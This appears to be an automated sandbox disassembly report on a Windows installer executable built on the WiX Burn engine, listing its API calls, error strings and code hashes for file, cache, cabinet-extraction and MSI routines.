                                                                                                                                                                    • Instruction Fuzzy Hash: 63A17072B4461EBFDB12DAE4CC85FEAF77CAB44744F010666B915A7181D730A984CBA0

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Function graph beginning at block 009186D0-0091871E (CreateFileW); nodes are marked Executed or Not Executed.
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00904DBC,?,?,00000000,00904DBC,00000000), ref: 00918713
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00918720
                                                                                                                                                                      • Part of subcall function 00943EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00943F73
                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,0094B4B8,00000000,00000000,00000000,?,00000000,0094B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009187CD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009187D7
                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00000000,0094B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00918902
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to seek to checksum in exe header., xrefs: 00918805
                                                                                                                                                                    • Failed to create engine file at path: %ls, xrefs: 00918751
                                                                                                                                                                    • cache.cpp, xrefs: 00918744, 009187FB, 00918862, 009188D1
                                                                                                                                                                    • Failed to seek to signature table in exe header., xrefs: 0091886C
                                                                                                                                                                    • Failed to seek to original data in exe burn section header., xrefs: 009188DB
                                                                                                                                                                    • msi.dll, xrefs: 00918814
                                                                                                                                                                    • Failed to seek to beginning of engine file: %ls, xrefs: 00918779
                                                                                                                                                                    • Failed to update signature offset., xrefs: 00918821
                                                                                                                                                                    • cabinet.dll, xrefs: 0091887B
                                                                                                                                                                    • Failed to zero out original data offset., xrefs: 009188F4
                                                                                                                                                                    • Failed to copy engine from: %ls to: %ls, xrefs: 009187A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                                    • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                                                                                                                    • API String ID: 3456208997-1976062716
                                                                                                                                                                    • Opcode ID: a24765b4376608c47923c15dccf8c4eb5773067c232c8f7ea14dda7a13403f2f
                                                                                                                                                                    • Instruction ID: d38a173b8504a79bac8de4b46ef442594eb733769b2cb8cc6c1c745a7bdaed42
                                                                                                                                                                    • Opcode Fuzzy Hash: a24765b4376608c47923c15dccf8c4eb5773067c232c8f7ea14dda7a13403f2f
                                                                                                                                                                    • Instruction Fuzzy Hash: D451F476B41639ABE7119AA48C46FBF766CEF84B20F110564FE10FB180EB60DC40A7E1

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Function graph beginning at block 0090762C-00907EDF (InitializeCriticalSection); nodes are marked Executed or Not Executed.
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0091756B,009053BD,00000000,00905445), ref: 0090764C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                    • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                                    • API String ID: 32694325-3635313340
                                                                                                                                                                    • Opcode ID: c156ed2cc4a4448f7851275a7c4a4c4cfed49b849163b58e0e59dcb3be3c1654
                                                                                                                                                                    • Instruction ID: 06f7d3deee0df0798183c3f82866a38d1d22cb806b8c7f1ddcc73d57e0cac1e1
                                                                                                                                                                    • Opcode Fuzzy Hash: c156ed2cc4a4448f7851275a7c4a4c4cfed49b849163b58e0e59dcb3be3c1654
                                                                                                                                                                    • Instruction Fuzzy Hash: 353237F0D167299FDBB58F5AC98878DFAF4BB49304F5085EED20CA6250D7B01A888F45

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Function graph beginning at block 009182BA-00918303 (call 0092F8E0); nodes are marked Executed or Not Executed.
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00905489), ref: 00918310
                                                                                                                                                                      • Part of subcall function 00940879: OpenProcessToken.ADVAPI32(?,00000008,?,009053BD,00000000,?,?,?,?,?,?,?,0091769D,00000000), ref: 00940897
                                                                                                                                                                      • Part of subcall function 00940879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0091769D,00000000), ref: 009408A1
                                                                                                                                                                      • Part of subcall function 00940879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0091769D,00000000), ref: 0094092B
                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00918336
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00918340
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 009183BD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009183C7
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00918406
                                                                                                                                                                    Strings
                                                                                                                                                                    • Temp\, xrefs: 00918395
                                                                                                                                                                    • Failed to concat Temp directory on windows path for working folder., xrefs: 009183AD
                                                                                                                                                                    • Failed to create working folder guid., xrefs: 00918413
                                                                                                                                                                    • Failed to append bundle id on to temp path for working folder., xrefs: 00918470
                                                                                                                                                                    • Failed to ensure windows path for working folder ended in backslash., xrefs: 0091838B
                                                                                                                                                                    • cache.cpp, xrefs: 00918364, 009183EB, 0091843C
                                                                                                                                                                    • Failed to copy working folder path., xrefs: 0091848B
                                                                                                                                                                    • %ls%ls\, xrefs: 00918458
                                                                                                                                                                    • Failed to get windows path for working folder., xrefs: 0091836E
                                                                                                                                                                    • Failed to get temp path for working folder., xrefs: 009183F5
                                                                                                                                                                    • Failed to convert working folder guid into string., xrefs: 00918446
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                                    • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                                    • API String ID: 266130487-819636856
                                                                                                                                                                    • Opcode ID: 78f612fda97eed9387c3fc3d50f0f42a4740c235990d82115eeccfeb6d9cbe9d
                                                                                                                                                                    • Instruction ID: 227fa85898c8d27f432bf9c004fd56a2c3a6fdf54720bb72eab9b34a47ab92a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 78f612fda97eed9387c3fc3d50f0f42a4740c235990d82115eeccfeb6d9cbe9d
                                                                                                                                                                    • Instruction Fuzzy Hash: 0341F432F45329A7D730D6A68C0AFDB73ACAB84B15F004565BE04F7190EE74DD4896E1

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Function graph beginning at block 009210FB-00921127 (CoInitializeEx); nodes are marked Executed or Not Executed.
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 0092111D
                                                                                                                                                                    • CoUninitialize.COMBASE ref: 00921398
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                                                    • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 3442037557-1168358783
                                                                                                                                                                    • Opcode ID: 93dd3ad9fedcd840d75ffeecdbbbb67fdc7d6ed4fc7efd8527115f13b155890a
                                                                                                                                                                    • Instruction ID: 68d22ebfc330d89f08cb697f8c696d19575065767183241694aa0e1bfb09a6f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 93dd3ad9fedcd840d75ffeecdbbbb67fdc7d6ed4fc7efd8527115f13b155890a
                                                                                                                                                                    • Instruction Fuzzy Hash: 8451AC37D44171E7CF20D7A5AC05EAB36589BE1730B224365FD21FB299D2698C20D2D5

                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00905266,?,?,00000000,?,?), ref: 00904303
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(000000D0,?,?,00905266,?,?,00000000,?,?), ref: 0090430C
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00905266,?,?,00000000,?,?), ref: 00904352
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00905266,?,?,00000000,?,?), ref: 0090435C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00905266,?,?,00000000,?,?), ref: 00904370
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00905266,?,?,00000000,?,?), ref: 00904380
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00905266,?,?,00000000,?,?), ref: 009043D0
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00905266,?,?,00000000,?,?), ref: 009043DA
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00905266,?,?,00000000,?,?), ref: 009043EE
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00905266,?,?,00000000,?,?), ref: 009043FE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                                    • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                    • API String ID: 3039292287-3209860532
                                                                                                                                                                    • Opcode ID: 6fc848be8f88addfcd98544b9980ef46f5c028702baf110d76a78c56eb96dfca
                                                                                                                                                                    • Instruction ID: 53399bdfdc693ce773c27979f08896d17b6ae54ef960c77253ac5bd089e8a749
                                                                                                                                                                    • Opcode Fuzzy Hash: 6fc848be8f88addfcd98544b9980ef46f5c028702baf110d76a78c56eb96dfca
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51A0B2A44215BFCB20DBA8CC86F9A77ADEF44764F104116F714A72E0D7B0E950CBA0

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0090C47F,00905405,?,?,00905445), ref: 0090C2D6
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C2E7
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?), ref: 0090C336
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C33C
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C33F
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C349
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C39B
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C3A5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                    • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                                    • API String ID: 2619879409-373955632
                                                                                                                                                                    • Opcode ID: b1d5e4c1372b0db374dd49940633acdffe18b9363a26334e9bbb8a7f0d083a37
                                                                                                                                                                    • Instruction ID: dbe34c0e390382a200813dc909be1bb48bf9d25bd7285adc3132acb72667a9c9
                                                                                                                                                                    • Opcode Fuzzy Hash: b1d5e4c1372b0db374dd49940633acdffe18b9363a26334e9bbb8a7f0d083a37
                                                                                                                                                                    • Instruction Fuzzy Hash: 0541B6B6150205AFDB219F299C49F1B7BA9EBC5720B218629FE14AB3D1DB71C801DB60
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00903838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00903877
                                                                                                                                                                      • Part of subcall function 00903838: GetLastError.KERNEL32 ref: 00903881
                                                                                                                                                                      • Part of subcall function 00944A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00944A9D
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00942B41
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00942B61
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00942B81
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00942BA1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00942BC1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00942BE1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00942C01
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                                    • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                    • API String ID: 2510051996-1735120554
                                                                                                                                                                    • Opcode ID: fbc79bb10875c7b9cc94c1aa9e57b43549d653b19323755f6f1d4d4714b4f761
                                                                                                                                                                    • Instruction ID: ddab3fefbe98e498ed9a2039b3753bc6181f59b14be34a2b2d5341da3e3db81d
                                                                                                                                                                    • Opcode Fuzzy Hash: fbc79bb10875c7b9cc94c1aa9e57b43549d653b19323755f6f1d4d4714b4f761
                                                                                                                                                                    • Instruction Fuzzy Hash: F331DFB1969209EBDB11AF60ED02B297BA4F794369F40013EE404D6170F7F20885FFA4
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0090C3EB,?,00000000,?,0090C47F), ref: 00921778
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C3EB,?,00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 00921781
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorEventLast
                                                                                                                                                                    • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                                    • API String ID: 545576003-938279966
                                                                                                                                                                    • Opcode ID: 35b2fc3df926252b11d3087a905faede19c52c1c27f6a9ae32324441a07b4550
                                                                                                                                                                    • Instruction ID: b3e32f3bf286884f3a2c08f3da9467b2ce2f0e6a2dcc6f94cca546c9fd822de3
                                                                                                                                                                    • Opcode Fuzzy Hash: 35b2fc3df926252b11d3087a905faede19c52c1c27f6a9ae32324441a07b4550
                                                                                                                                                                    • Instruction Fuzzy Hash: 03212077D4073A77D33156A66C85F276A9CEF90774B124221FD04BB184E750DC1086E5
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0093FCD6
                                                                                                                                                                    • GetProcAddress.KERNEL32(SystemFunction041), ref: 0093FCE8
                                                                                                                                                                    • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0093FD2B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093FD3F
                                                                                                                                                                    • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0093FD77
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093FD8B
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ErrorLast
                                                                                                                                                                    • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                                                                                                                    • API String ID: 4214558900-3191127217
                                                                                                                                                                    • Opcode ID: d96d088e667e47de48077f88d4b18975297a09ec077b8d3dad110cf136a0ef56
                                                                                                                                                                    • Instruction ID: 131ae30a7e02703ab5f35e817485a5b1418052b09a39e542688ac23cb2e755cb
                                                                                                                                                                    • Opcode Fuzzy Hash: d96d088e667e47de48077f88d4b18975297a09ec077b8d3dad110cf136a0ef56
                                                                                                                                                                    • Instruction Fuzzy Hash: CE21FC32D643359BC7315B16AD1DB866A98EB40B55F010139FC11EB2E0FBA48C41FED5
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 009208F2
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0092090A
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0092090F
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00920912
                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 0092091C
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0092098B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 00920998
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to duplicate handle to cab container., xrefs: 0092094A
                                                                                                                                                                    • <the>.cab, xrefs: 009208EB
                                                                                                                                                                    • Failed to open cabinet file: %hs, xrefs: 009209C9
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920940, 009209BC
                                                                                                                                                                    • Failed to add virtual file pointer for cab container., xrefs: 00920971
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                    • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                    • API String ID: 3030546534-3446344238
                                                                                                                                                                    • Opcode ID: e52e98c65efbbf0b4da00b45bb59b726a3789ac6482d9546adaf40d6ae4f6654
                                                                                                                                                                    • Instruction ID: 2ad3d1fde01a9d55c13571ee60064fd455d3c9db39205ceea4c0a7f9a3609347
                                                                                                                                                                    • Opcode Fuzzy Hash: e52e98c65efbbf0b4da00b45bb59b726a3789ac6482d9546adaf40d6ae4f6654
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A31043A941235BBEB20AB959C49F9EBE6CEF85761F114211FE05B7282D7709C00DBE0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00904E11,?,?), ref: 00916A77
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,00904E11,?,?), ref: 00916A7D
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,?,00904E11,?,?), ref: 00916A80
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00904E11,?,?), ref: 00916A8A
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,00904E11,?,?), ref: 00916B03
                                                                                                                                                                    Strings
                                                                                                                                                                    • burn.filehandle.attached, xrefs: 00916AD0
                                                                                                                                                                    • core.cpp, xrefs: 00916AAE
                                                                                                                                                                    • Failed to duplicate file handle for attached container., xrefs: 00916AB8
                                                                                                                                                                    • Failed to append the file handle to the command line., xrefs: 00916AEB
                                                                                                                                                                    • %ls -%ls=%u, xrefs: 00916AD7
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                                    • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                                                                                                                                    • API String ID: 4224961946-4196573879
                                                                                                                                                                    • Opcode ID: 6d9d24f65a3d84eced2350f5f1e3ada2c085bdbe3338285ab3bd6cfd825b2fc4
                                                                                                                                                                    • Instruction ID: 6c44c98ac3406fc7cf8318dbe6679bb66bd9efc215fff3ea7daf0e5f6ea5408b
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d9d24f65a3d84eced2350f5f1e3ada2c085bdbe3338285ab3bd6cfd825b2fc4
                                                                                                                                                                    • Instruction Fuzzy Hash: 9611AF32E50229FBCB10AEA98C09E9EBB68AF45735F118251FD20F72D0D7B49D0097D0
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00943309
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00943325
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009433AC
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009433B7
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 760788290-3482516102
                                                                                                                                                                    • Opcode ID: 7b9584aa36611b35dbf4abf9c26880fa984f8e8d0aa9abecfe3fda2d8d57e29d
                                                                                                                                                                    • Instruction ID: 01770af716768999d33400a10dc3dd165d1a7c8c00916b02bc6aa20b8cec68bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 7b9584aa36611b35dbf4abf9c26880fa984f8e8d0aa9abecfe3fda2d8d57e29d
                                                                                                                                                                    • Instruction Fuzzy Hash: 4221A335901219EFCB25DFA5C848FAEBBB9AF85711F558258F905AB220DB31DE009B90
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(?,00000008,?,009053BD,00000000,?,?,?,?,?,?,?,0091769D,00000000), ref: 00940897
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0091769D,00000000), ref: 009408A1
